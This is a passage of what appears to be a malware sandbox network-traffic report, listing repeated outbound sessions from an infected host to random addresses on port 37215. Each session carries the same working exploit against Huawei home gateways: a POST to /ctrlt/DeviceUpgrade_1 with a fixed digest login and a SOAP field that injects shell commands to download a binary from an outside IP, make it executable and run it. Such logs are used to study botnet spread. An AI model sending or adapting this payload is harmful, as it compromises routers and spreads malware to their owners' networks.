                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2487192.168.2.1550828190.109.214.7237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.479670048 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2488192.168.2.155448294.20.241.1237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.480648041 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2489192.168.2.153775231.189.226.22137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.480688095 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2490192.168.2.1541172197.224.232.11037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.480705976 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2491192.168.2.155605841.113.185.7137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.480741024 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2492192.168.2.1547450138.168.1.5637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.480758905 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2493192.168.2.1543166121.96.92.16237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.480770111 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2494192.168.2.155988231.148.84.14037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.480838060 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2495192.168.2.1559302181.88.186.11937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.552257061 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2496192.168.2.1537574102.49.200.9637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.552309990 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
